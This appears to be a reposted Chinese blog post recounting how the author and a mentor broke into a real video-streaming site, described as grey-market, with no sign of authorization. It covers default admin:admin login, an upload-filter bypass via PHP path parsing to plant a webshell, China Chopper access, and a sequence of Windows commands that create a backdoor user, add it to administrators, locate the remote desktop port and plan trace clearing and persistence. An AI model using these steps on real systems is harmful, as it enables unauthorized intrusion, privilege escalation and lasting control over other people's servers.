一个付费用户4000+的视频站getshell

只有一个目标域名  domaincom
 
前期信息收集:
  • 该站点是一个视频app的推广网站
  • 子域名爆破一波:发现一个比较有意思的的视频主站,没有分析app的数据包,但是估计就是调用的这个主站的资源。
  • 后台尝试一下:admin直接跳转到了后台,卧槽太顺利了
  • 有验证码,瞬间想放弃,师父在旁边说,有验证码就放弃了啊
  • 尝试admin:admin登录成功(!!!!!!
 
后台进去了找上传点:
 
后台总览:
 
上传点尝试了  filename.php.jpg    file.php/filename.jpg   burp改包   
最后上传的filename.php  访问domain.com/filename.php/222.php  成功解析
 
上菜刀!!!!!
 
 
拿到webshell之后:
菜刀连接进入命令行
第一步:查找当前用户具有增删改查的目录
c:/WINDOWS/TEMP
第二步:查看系统补丁信息
systeminfo
第三步:上传exp---提权---创建用户---查找远程桌面---登录----清除痕迹----维持权限
 
查看当前的用户:
query user
新建用户
net user test Asd#@321 /add
查询当前管理员用户组成员
net localgroup administrators
将用户添加到管理员组
net localgroup administrators test /add 
查询当前用户信息
whoami
查询远程桌面端口
tasklist -svc
netstat -ano
访问远程桌面,end
 
总结:注入点的解析思路,根据补丁查找对应的exp,查找对应的远程桌面端口。
 
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
最近在搞基于docker的elk+蜜罐分布式部署,没有搞通,烦得很。师父带着日了个灰产站,也算学习了一下整个流程。

转载于:https://www.cnblogs.com/R1card0/p/10496881.html

你可能感兴趣的:(php,运维)